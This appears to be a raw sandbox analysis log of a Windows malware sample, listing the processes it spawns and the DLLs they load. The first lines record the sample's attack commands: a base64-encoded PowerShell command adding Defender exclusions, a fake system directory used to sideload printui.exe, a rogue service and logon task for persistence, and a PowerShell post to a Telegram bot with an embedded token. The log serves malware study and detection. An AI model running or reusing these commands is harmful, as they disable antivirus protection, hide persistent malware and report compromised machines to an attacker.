Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x590769 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Users\user\Desktop\app64.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\app64.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows \System32\printui.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows \System32\printui.exe Section loaded: printui.dll Jump to behavior
Source: C:\Windows \System32\printui.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows \System32\printui.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcurl.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libpq.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: zlib1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libssl-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcrypto-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libintl-9.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcrypto-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libwinpthread-1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libiconv-2.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
